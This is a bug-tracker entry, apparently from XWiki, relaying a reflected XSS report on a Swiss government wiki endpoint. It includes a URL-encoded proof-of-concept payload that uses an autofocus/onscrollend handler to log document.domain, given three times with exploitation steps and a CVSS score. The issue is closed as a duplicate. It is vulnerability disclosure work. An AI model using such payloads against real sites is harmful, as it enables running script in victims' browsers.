Loading...

XML

Word

Printable

Details

Type: Bug
Resolution: Duplicate
Priority: Major
Fix Version/s: None
Affects Version/s: 16.10.5
Component/s: None
Labels:
- security
Environment:
openDesk 1.4.0

Difficulty:
Unknown
Documentation:
N/A
Documentation in Release Notes:
N/A
Similar issues:

Description

The following issue was reported to us via NCSC:

Bug Key: STOP-disable
Bug Type: Execute code on client (e.g. XSS)
Scope: *.admin.ch
Endpoint: https://wiki.pocboss.admin.ch/bin/view/Main/?xpage=distribution&extensionId=%3c%2f%73%70%61%6e%3e%3c%78%73%73%20%6f%6e%73%63%72%6f%6c%6c%65%6e%64%3d%63%6f%6e%73%6f%6c%65%2e%6c%6f%67%28%64%6f%63%75%6d%65%6e%74%2e%64%6f%6d%61%69%6e%29%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%62%6c%6f%63%6b%3b%6f%76%65%72%66%6c%6f%77%3a%61%75%74%6f%3b%77%69%64%74%68%3a%31%70%78%3b%68%65%69%67%68%74%3a%31%70%78%3b%22%3e%78%3c%78%73%73%20%61%75%74%6f%66%6f%63%75%73%20%74%61%62%69%6e%64%65%78%3d%31%3e&extension
IP used by the researcher: 59.92.92.87

Rating by the researcher:
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVSS Score: 6.1

Report:
Bug description:
Reflected XSS via parameters extensionId and extensionVersionConstraint on endpoint
https://wiki.pocboss.admin.ch/bin/view/Main/?xpage=distribution&extensionId=%3c%2f%73%70%61%6e%3e%3c%78%73%73%20%6f%6e%73%63%72%6f%6c%6c%65%6e%64%3d%63%6f%6e%73%6f%6c%65%2e%6c%6f%67%28%64%6f%63%75%6d%65%6e%74%2e%64%6f%6d%61%69%6e%29%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%62%6c%6f%63%6b%3b%6f%76%65%72%66%6c%6f%77%3a%61%75%74%6f%3b%77%69%64%74%68%3a%31%70%78%3b%68%65%69%67%68%74%3a%31%70%78%3b%22%3e%78%3c%78%73%73%20%61%75%74%6f%66%6f%63%75%73%20%74%61%62%69%6e%64%65%78%3d%31%3e&extensionVersionConstraint=%3dxss

Exploitation:
Step 1- Open a new browser tab and then open dev tools. Then open below link in that browser tab.. The javascript gets triggered and the domain gets printed in the console log.

https://wiki.pocboss.admin.ch/bin/view/Main/?xpage=distribution&extensionId=%3c%2f%73%70%61%6e%3e%3c%78%73%73%20%6f%6e%73%63%72%6f%6c%6c%65%6e%64%3d%63%6f%6e%73%6f%6c%65%2e%6c%6f%67%28%64%6f%63%75%6d%65%6e%74%2e%64%6f%6d%61%69%6e%29%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%62%6c%6f%63%6b%3b%6f%76%65%72%66%6c%6f%77%3a%61%75%74%6f%3b%77%69%64%74%68%3a%31%70%78%3b%68%65%69%67%68%74%3a%31%70%78%3b%22%3e%78%3c%78%73%73%20%61%75%74%6f%66%6f%63%75%73%20%74%61%62%69%6e%64%65%78%3d%31%3e&extensionVersionConstraint=%3dxss

PoC:
https://wiki.pocboss.admin.ch/bin/view/Main/?xpage=distribution&extensionId=%3c%2f%73%70%61%6e%3e%3c%78%73%73%20%6f%6e%73%63%72%6f%6c%6c%65%6e%64%3d%63%6f%6e%73%6f%6c%65%2e%6c%6f%67%28%64%6f%63%75%6d%65%6e%74%2e%64%6f%6d%61%69%6e%29%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%62%6c%6f%63%6b%3b%6f%76%65%72%66%6c%6f%77%3a%61%75%74%6f%3b%77%69%64%74%68%3a%31%70%78%3b%68%65%69%67%68%74%3a%31%70%78%3b%22%3e%78%3c%78%73%73%20%61%75%74%6f%66%6f%63%75%73%20%74%61%62%69%6e%64%65%78%3d%31%3e&extensionVersionConstraint=%3dxss

Impact:
The attacker can run arbitary javascript on the victims browser

Remediation:
Add URL encoding on the vulnerable parameter extensionId and extensionVersionConstraint

—

I can not reproduce this issue in XWiki 16.10.5 (as part of openDesk 1.4.0 run by our customer), but still wanted to report this issue.

Attachments

Issue Links

duplicates

XWIKI-23096 Reflected XSS vulnerability in extension and job_status_json templates

Closed

Activity

People

Assignee:: Michael Hamann

Reporter:: René Fischer

Votes:: 0 Vote for this issue

Watchers:: 1 Start watching this issue

Dates

Created:: 11/Oct/25 11:15

Updated:: 3 days ago 18:14

Resolved:: 13/Oct/25 11:11

Date of First Response:: 13/Oct/25 11:11 AM